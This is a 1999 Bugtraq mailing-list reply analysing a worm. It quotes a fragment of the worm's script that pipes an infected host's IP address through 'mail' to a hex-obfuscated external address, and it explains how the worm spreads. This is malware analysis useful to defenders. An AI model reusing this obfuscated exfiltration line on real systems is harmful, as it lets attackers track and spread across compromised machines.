[11796] in bugtraq
Re: MW
daemon@ATHENA.MIT.EDU (Adam Morrison)
Thu Sep 9 21:06:28 1999
Message-Id: <E11ON5h-0006DQ-00@devnull.xpert.com>
Date: Tue, 7 Sep 1999 17:23:25 +0200
Reply-To: Adam Morrison <adam@XPERT.COM>
From: Adam Morrison <adam@XPERT.COM>
X-To: scorpios@cs.huji.ac.il
To: BUGTRAQ@SECURITYFOCUS.COM
> On Wed, 1 Sep 1999, Christian Koderer wrote:
> > ./IP | mail `printf
> > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > logout
> > _EOF_
>
>
> In case no one bothered figuring this one out, this translates to
> 'beurp@hotmail.com'
>
> Apparently './IP' is a program it runs to figure out which IP it should
> get the worm files from. Did you find a similarly named file?
It's a worm; it gets the worm files from the last infected machine.
`IP' returns the address of the machine that the copy of the worm
is running on, and is used in the `cmd' grappling hook which
apparently gets executed on compromised remote hosts. Each time the
worm infects a machine, it mails the IP address of that machine to
<beurp@hotmail.com>.
Now, not to make any unfounded allegations, but this worm looks
remarkably like ADMw0rm. I wonder why it restarts named when first
infecting a host, when it appears to also utilize several other
vulnerabilites in order to get in. Ho, hum.
